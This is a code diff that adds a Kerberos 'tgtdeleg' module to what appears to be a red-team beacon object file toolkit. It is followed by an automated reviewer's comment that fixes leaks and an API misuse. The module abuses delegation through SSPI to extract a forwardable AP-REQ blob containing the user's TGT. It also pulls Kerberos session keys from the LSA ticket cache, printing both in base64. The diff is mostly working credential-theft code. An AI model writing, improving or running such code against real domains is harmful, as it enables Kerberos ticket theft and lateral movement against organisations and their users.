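- PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
- PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n",
- ADVAPI32$LsaNtStatusToWinError(protocolStatus));
+ if (NT_SUCCESS(status)) {
+ if (NT_SUCCESS(protocolStatus)) {
+ PRINT(dispatch, "[+] Successfully purged tickets.\n");
+ } else {
+ PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n",
+ ADVAPI32$LsaNtStatusToWinError(protocolStatus));
+ }
  } else {
- PRINT(dispatch, "[+] Successfully purged tickets.\n");
+ PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
  }
 
  SECUR32$LsaDeregisterLogonProcess(hLsa);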
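--- a/source/sessions.c
+++ b/source/sessions.c
@@ -15,12 +15,6 @@
  for (int i = 0; i < sessionData.sessionCount; i++) {
  data = sessionData.sessionData[i];
  if (data != NULL) {
- // PRINT(dispatch, "[%d] Session %d %x:0x%x %s\\%s %s:%s\n",
- // i, data->Session, data->LogonId.HighPart, data->LogonId.LowPart,
- // GetNarrowString(data->LogonDomain.Buffer),
- // GetNarrowString(data->UserName.Buffer),
- // GetNarrowString(data->AuthenticationPackage.Buffer),
- // GetLogonTypeString(data->LogonType));
  PrintLogonSessionData(dispatch, *data);
  if (i != sessionData.sessionCount - 1) {
  PRINT(dispatch, "\n\n");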
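--- a/source/tgtdeleg.c
+++ b/source/tgtdeleg.c
@@ -0,0 +1,112 @@
+#include "tgtdeleg.h"
+
+void execute_tgtdeleg(WCHAR** dispatch, char* spn) {
+ CredHandle hCred;
+ TimeStamp timeStamp;
+ SECURITY_STATUS status = SECUR32$AcquireCredentialsHandleA(NULL, "Kerberos", SECPKG_CRED_OUTBOUND, NULL, NULL, 0,
+ NULL, &hCred, &timeStamp);
+ if (status == SEC_E_OK) {
+ CtxtHandle hCtx;
+ SecBuffer secBuf = {0, SECBUFFER_TOKEN, NULL};
+ SecBufferDesc secBufDesc = {SECBUFFER_VERSION, 1, &secBuf};
+ ULONG contextAttr;
+ status = SECUR32$InitializeSecurityContextA(
+ &hCred, NULL, (SEC_CHAR*)spn, ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_DELEGATE | ISC_REQ_MUTUAL_AUTH, 0,
+ SECURITY_NATIVE_DREP, NULL, 0, &hCtx, &secBufDesc, &contextAttr, NULL);
+ if (status == SEC_E_OK || status == SEC_I_CONTINUE_NEEDED) {
+ if (contextAttr & ISC_REQ_DELEGATE) {
+ int b64len = Base64encode_len(secBuf.cbBuffer);
+ char* encoded = MSVCRT$calloc(b64len, sizeof(char));
+ if (encoded == NULL) {
+ PRINT(dispatch, "[!] Could not allocate memory.\n");
+ goto out;
+ }
+ Base64encode(encoded, secBuf.pvBuffer, secBuf.cbBuffer);
+ PRINT(dispatch, "[+] AP-REQ blob: %s\n", encoded);
+ MSVCRT$free(encoded);
+ if (secBuf.pvBuffer) {
+ SECUR32$FreeContextBuffer(secBuf.pvBuffer);
+ }
+ SECUR32$DeleteSecurityContext(&hCtx);
+ } else {
+ PRINT(dispatch, "[!] Client is not allowed to delegate to target.\n");
+ }
+ } else {
+ PRINT(dispatch, "[!] InitializeSecurityContext: 0x%lx\n", status);
+ }
+ out:
+ SECUR32$FreeCredentialsHandle(&hCred);
+ } else {
+ PRINT(dispatch, "[!] AcquireCredentialsHandle: 0x%lx\n", status);
+ }
+}
+
+void execute_tgtdeleg_getkey(WCHAR** dispatch, HANDLE hToken, char* target, LONG encType) {
+ HANDLE hLsa;
+ NTSTATUS status = GetLsaHandle(hToken, FALSE, &hLsa);
+ if (!NT_SUCCESS(status)) {
+ PRINT(dispatch, "[!] GetLsaHandle %ld\n", status);
+ return;
+ }
+ ULONG authPackage;
+ LSA_STRING krbAuth = {.Buffer = "kerberos", .Length = 8, .MaximumLength = 9};
+ status = SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage);
+ if (!NT_SUCCESS(status)) {
+ PRINT(dispatch, "[!] LsaLookupAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
+ goto out;
+ }
+ WCHAR* wTarget = GetWideString(target);
+ if (wTarget == NULL) {
+ PRINT(dispatch, "[!] Could not allocate memory.\n");
+ goto out;
+ }
+ USHORT dwTarget = (MSVCRT$wcslen(wTarget) + 1) * sizeof(WCHAR);
+ ULONG requestSize = dwTarget + sizeof(KERB_RETRIEVE_TKT_REQUEST);
+ PKERB_RETRIEVE_TKT_REQUEST request =
+ (PKERB_RETRIEVE_TKT_REQUEST)MSVCRT$calloc(requestSize, sizeof(KERB_RETRIEVE_TKT_REQUEST));
+ if (request == NULL) {
+ PRINT(dispatch, "[!] Could not allocate memory.\n");
+ goto out;
+ }
+ request->MessageType = KerbRetrieveEncodedTicketMessage;
+ request->CacheOptions = KERB_RETRIEVE_TICKET_USE_CACHE_ONLY;
+ request->EncryptionType = encType;
+ request->TargetName.Length = dwTarget - sizeof(WCHAR);
+ request->TargetName.MaximumLength = dwTarget;
+ request->TargetName.Buffer = (PWSTR)((PBYTE)request + sizeof(KERB_RETRIEVE_TKT_REQUEST));
+ MSVCRT$memcpy(request->TargetName.Buffer, wTarget, request->TargetName.MaximumLength);
+ PKERB_RETRIEVE_TKT_RESPONSE response;
+ NTSTATUS protocolStatus;
+ status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, request, requestSize, &response, &requestSize,
+ &protocolStatus);
+ MSVCRT$free(request);
+ MSVCRT$free(wTarget);
+ if (NT_SUCCESS(status)) {
+ if (NT_SUCCESS(protocolStatus)) {
+ if (requestSize > 0) {
+ int len = Base64encode_len(response->Ticket.SessionKey.Length);
+ char* encoded = (char*)MSVCRT$calloc(len, sizeof(char));
+ if (encoded != NULL) {
+ Base64encode(encoded, response->Ticket.SessionKey.Value, response->Ticket.SessionKey.Length);
+ PRINT(dispatch, "[+] Session key: %s\n", encoded);
+ MSVCRT$free(encoded);
+ } else {
+ PRINT(dispatch, "[!] Could not allocate memory.\n");
+ }
+ SECUR32$LsaFreeReturnBuffer(&response);
+ } else {
+ PRINT(dispatch, "[!] Empty response.\n");
+ }
+ } else {
+ PRINT(dispatch, "[!] LsaCallAuthenticationPackage protocol status: %ld\n",
+ ADVAPI32$LsaNtStatusToWinError(protocolStatus));
+ }
+ } else {
+ PRINT(dispatch, "[!] LsaCallAuthenticationPackage status: %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
+ }
+
+out:
+ SECUR32$LsaDeregisterLogonProcess(hLsa);
+ return;
+}
+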
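Review bot: In `execute_tgtdeleg` the token SSPI allocates into `secBuf.pvBuffer` (`ISC_REQ_ALLOCATE_MEMORY`) and the context behind `hCtx` are released only inside the `contextAttr & ISC_REQ_DELEGATE` branch, so the "not allowed to delegate" path and the `goto out` after a failed `calloc` both leak them; hoisting `FreeContextBuffer`/`DeleteSecurityContext` so they run on every path after a successful `InitializeSecurityContextA` (below) fixes all three and makes the `out:` label unnecessary, and testing the returned attributes with `ISC_RET_DELEGATE` rather than the request flag documents which side of the call the value belongs to (the two constants coincide). In `execute_tgtdeleg_getkey`, `SECUR32$LsaFreeReturnBuffer(&response);` hands LSA the address of the local pointer instead of the buffer it returned; it should read `SECUR32$LsaFreeReturnBuffer(response);`. Two smaller points in the same function: `wTarget` is not freed on the `request == NULL` path, and `MSVCRT$calloc(requestSize, sizeof(KERB_RETRIEVE_TKT_REQUEST))` allocates `requestSize` structs where the size arithmetic above it intends `requestSize` bytes, i.e. `MSVCRT$calloc(requestSize, 1)`.
```c
void execute_tgtdeleg(WCHAR** dispatch, char* spn) {
    // … unchanged: AcquireCredentialsHandleA, SecBuffer setup, InitializeSecurityContextA call …
        if (status == SEC_E_OK || status == SEC_I_CONTINUE_NEEDED) {
            if (contextAttr & ISC_RET_DELEGATE) {
                int b64len = Base64encode_len(secBuf.cbBuffer);
                char* encoded = MSVCRT$calloc(b64len, sizeof(char));
                if (encoded != NULL) {
                    Base64encode(encoded, secBuf.pvBuffer, secBuf.cbBuffer);
                    PRINT(dispatch, "[+] AP-REQ blob: %s\n", encoded);
                    MSVCRT$free(encoded);
                } else {
                    PRINT(dispatch, "[!] Could not allocate memory.\n");
                }
            } else {
                PRINT(dispatch, "[!] Client is not allowed to delegate to target.\n");
            }
            // SSPI allocated secBuf.pvBuffer (ISC_REQ_ALLOCATE_MEMORY) and hCtx on every
            // successful return, so release them on every path, not only after a delegable token.
            if (secBuf.pvBuffer) {
                SECUR32$FreeContextBuffer(secBuf.pvBuffer);
            }
            SECUR32$DeleteSecurityContext(&hCtx);
        } else {
            PRINT(dispatch, "[!] InitializeSecurityContext: 0x%lx\n", status);
        }
        SECUR32$FreeCredentialsHandle(&hCred);
    // … unchanged: AcquireCredentialsHandle failure branch …
```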